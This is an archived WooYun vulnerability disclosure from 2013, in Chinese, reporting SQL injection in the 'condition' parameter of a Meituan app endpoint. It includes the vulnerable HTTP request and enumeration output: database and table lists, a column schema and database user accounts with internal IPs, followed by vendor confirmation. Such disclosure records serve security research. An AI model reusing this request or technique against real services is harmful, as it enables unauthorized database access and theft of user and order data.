乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-09: 细节已通知厂商并且等待厂商处理中 2013-12-09: 厂商已经确认,细节仅向厂商公开 2013-12-19: 细节向核心白帽子及相关领域专家公开 2013-12-29: 细节向普通白帽子公开 2014-01-08: 细节向实习白帽子公开 2014-01-23: 细节向公众公开
昨天晚上去吃了个火锅,媳妇儿说团购能便宜个20块钱,然后就美美的拿出了美团APP,然后我就趁机瞅了瞅,本来已经终结的App系列又回来了……
涉及美团APP:美团餐厅+美团外卖+……请求如下
GET /woodpecker/poi/search?condition= HTTP/1.1Host: xianfu.meituan.comProxy-Connection: keep-aliveAccept-Encoding: gzipUser-Agent: ç¾å¢é¤å 1.2 (iPhone; iPhone OS 7.0.4; zh_CN)Connection: keep-aliveCookie: 1=_from
condition=存在注入
当前user和db
当前库
Database: woodpecker[52 tables]+-----------------------+| accesstoken || activemq_info || app || app_release_info || banner || canting_user || customer_requirements || desk_class || desk_order || desk_order_window || dining_table || filter_user || food || food_choose_feature || food_feature_count || food_material || food_offer || food_order || food_practice || food_practice_value || food_relation || food_set || food_tag || food_tag_value || food_taste || food_unit || log_info || meituan_outer_food || meituan_outer_order || meituan_outer_poi || order_code || order_offer || ordered_food || ordered_reward || outer_system || pad_info || poi_env || poi_info || poi_member_stat || poi_reward || poi_score_rules || printer || return_food_reason || score_event || special_food || statistics_trend || tmp || tmp_order_code || user_feedback || user_loyalty || wait_queue || waiter |+-----------------------+
垮裤 美团餐厅
Database: xianfu[36 tables]+--------------------------+| accesstoken || activity_coupon || card_manager_coupon_code || cardmanager_log || channel || client_behaviour || client_event || client_register || client_version || coupon || coupon_account || coupon_account_cookie || coupon_batchsend || coupon_channel || coupon_code || coupon_consume || coupon_customer || coupon_deal || coupon_poi || couponverify_log || customer || customer_action_h || customer_behaviour || customer_demo || customer_meituan || customer_poi || customer_relation || customer_weixin || customer_weixin_aptcha || fastverify_log || poi_sync || share_group || share_group_c || super_coupon_info || super_coupon_login || white_list |+--------------------------+Database: xianfuTable: coupon[17 columns]+------------------+---------------+| Column | Type |+------------------+---------------+| alertsms | varchar(1024) || brandname | varchar(255) || content | varchar(1024) || couponpic | varchar(255) || ctime | int(11) || duration | int(4) || etime | int(11) || event_expiretime | int(11) || event_type | int(5) || id | int(11) || sms | varchar(1024) || status | int(3) || stime | int(11) || title | varchar(1024) || type | int(2) || utime | int(11) || warn | int(11) |+------------------+---------------+
美团外卖库
Database: waimai[25 tables]+----------------------------+| wm_address || wm_app_channel || wm_app_version || wm_channel || wm_discount || wm_food || wm_food_import || wm_food_tag || wm_gao_poi_info || wm_log || wm_order || wm_order_detail || wm_order_detail_history || wm_order_history || wm_order_status_utimestamp || wm_poi || wm_poi_match || wm_poi_tag || wm_poi_tag_dic || wm_poi_utimestamp || wm_push_client || wm_tradearea_point || wm_user || wm_user_dialogue || wm_user_topic |+----------------------------+
各个字段什么名字我就不解释了吧最后dbs
available databases [11]:[*] biz_auth[*] information_schema[*] mysql[*] pangolin[*] performance_schema[*] test[*] test_waimai[*] waimai[*] woodpecker[*] xfbase[*] xianfu
看到这个pangolin 了嘛? 看看你们的内裤是不是还好好的users 各种admin root
database management system users [183]:[*] 'admin'@'10.64.10.104'[*] 'admin'@'localhost'[*] 'meituan_in'@'10.%'[*] 'monitor'@'10.%'[*] 'root'@'127.0.0.1'[*] 'root'@'::1'[*] 'root'@'localhost'[*] 'skrepl'@'10.%'[*] 'superadmin'@'10.64.10.104'[*] 'xianfu_waimai'@'10.%'
已经给你们做宣传了,还想怎样哪-0-
危害等级:中
漏洞Rank:8
确认时间:2013-12-09 10:28
感谢对美团网的关注,正在处理。
暂无